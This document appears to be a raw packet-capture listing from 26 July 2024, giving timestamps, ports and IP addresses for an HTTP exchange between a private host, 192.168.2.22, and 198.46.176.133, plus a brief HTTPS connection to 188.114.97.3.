Jul 26, 2024 13:02:47.317651987 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.317843914 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.317920923 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.317953110 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.317972898 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.318005085 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.318233013 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.318279982 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.318309069 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.318340063 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.318372965 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.318418026 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.318466902 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.318515062 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.318547964 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.318578959 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.318598032 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.318630934 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.318676949 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.319310904 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.319343090 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.319375038 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.319394112 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.319423914 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.319472075 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.319514990 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.319539070 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.319571018 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.319602013 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.319619894 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.319649935 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.319683075 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.319717884 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.319739103 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.319931030 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.319963932 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.319994926 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.320015907 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.320045948 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.320079088 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.320125103 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.320414066 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.320462942 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.320513964 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.320537090 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.320565939 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.320600033 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.320646048 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.320830107 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.320861101 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.320893049 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.320911884 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.320941925 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.320974112 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.321006060 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.321024895 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.321233988 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.321264982 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.321284056 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.321315050 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.321358919 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.321600914 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.321633101 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.321665049 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.321718931 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.321778059 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.321809053 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.321841002 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.321858883 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.321888924 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.321918964 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.321938038 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.321966887 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.322010040 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.322022915 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.322565079 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.322612047 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.322633982 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.322666883 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.322711945 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.322788954 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.322818995 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.322849989 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.322880983 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.322899103 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.323046923 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.323076963 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.323110104 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.323127985 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.323684931 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.323729992 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.323753119 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.323784113 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.323900938 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.323931932 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.323951006 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.323982000 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.324024916 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.324208975 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.324239969 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.324271917 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.324317932 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.324369907 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.324399948 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.324431896 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.324450016 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.324479103 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.324526072 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.324548006 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.324578047 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.324609995 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.324654102 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.324768066 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.324798107 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.324845076 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.324912071 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.325021982 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.325053930 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.325073004 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.325186014 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.325217009 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.325236082 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.325264931 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.325295925 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.325314045 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.325375080 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.325421095 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.336870909 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.339179039 CEST	443	49179	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:47.339274883 CEST	443	49179	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:47.339834929 CEST	49179	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:47.340358019 CEST	49179	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:47.340372086 CEST	443	49179	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:47.362761021 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.362785101 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.362801075 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.362850904 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.362973928 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.362987995 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.363003969 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.363018990 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.363049030 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.407118082 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.407166004 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.407201052 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.407248020 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.407268047 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.407311916 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.407347918 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.407367945 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.407627106 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.407687902 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.407706022 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.407737970 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.407771111 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.407804012 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.407823086 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.407871008 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.407903910 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.407923937 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.407953024 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.407985926 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.408006907 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.408035994 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.408067942 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.408099890 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.408119917 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.408175945 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.408225060 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.408247948 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.408281088 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.408318043 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.408339977 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.408371925 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.408402920 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.408427954 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.408457041 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.408505917 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.408525944 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.408560991 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.408591986 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.408623934 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.408643961 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.408673048 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.408715010 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.408740997 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.408771992 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.408804893 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.408823967 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.408853054 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.408896923 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.408922911 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.408953905 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.408986092 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.409018040 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.409037113 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.409084082 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.409116030 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.409152031 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.409179926 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.409209967 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.409240961 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.409260035 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.409290075 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.409322977 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.409353018 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.409370899 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.409415960 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.409446955 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.409466028 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.409497023 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.409528017 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.409548998 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.409584045 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.409615040 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.409635067 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.409663916 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.409693956 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.409717083 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.409804106 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.409836054 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.409856081 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.409887075 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.409919977 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.409940004 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.409986973 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.410020113 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.410039902 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.410068989 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.410103083 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.410123110 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.410608053 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.410640001 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.410660028 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.410690069 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.410723925 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.410743952 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.410912037 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.410943985 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.410974979 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.410995007 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.411024094 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.411056995 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.411103010 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.411344051 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.411375999 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.411406994 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.411426067 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.411456108 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.411504984 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.411537886 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.411556005 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.411586046 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.411636114 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.411669970 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.412090063 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.412122011 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.412173986 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.412265062 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.412297010 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.412348032 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.413351059 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.413383007 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.413446903 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.413485050 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.413516998 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.413584948 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.413877964 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.413912058 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.414072990 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.414107084 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.414128065 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.414156914 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.414189100 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.414221048 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.414239883 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.414269924 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.414302111 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.414319992 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.414350033 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.414391994 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.414417982 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.414452076 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.414484024 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.414504051 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.414535999 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.414567947 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.414599895 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.414618969 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.414738894 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.415819883 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.443442106 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.449275017 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.449292898 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.449309111 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.449337959 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.449346066 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.449359894 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.449374914 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.449392080 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.449402094 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.449431896 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.490273952 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.490322113 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.490390062 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.490422010 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.490454912 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.490473986 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.490489006 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.490506887 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.490524054 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.490540981 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.490557909 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.490580082 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.490694046 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.491542101 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.491574049 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.491663933 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.491710901 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.493628979 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.493700981 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.493796110 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.493833065 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.493911028 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.495635033 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.495666981 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.495698929 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.495737076 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.495754957 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.495805979 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.495839119 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.495861053 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.495892048 CEST	80	49177	198.46.176.133	192.168.2.22
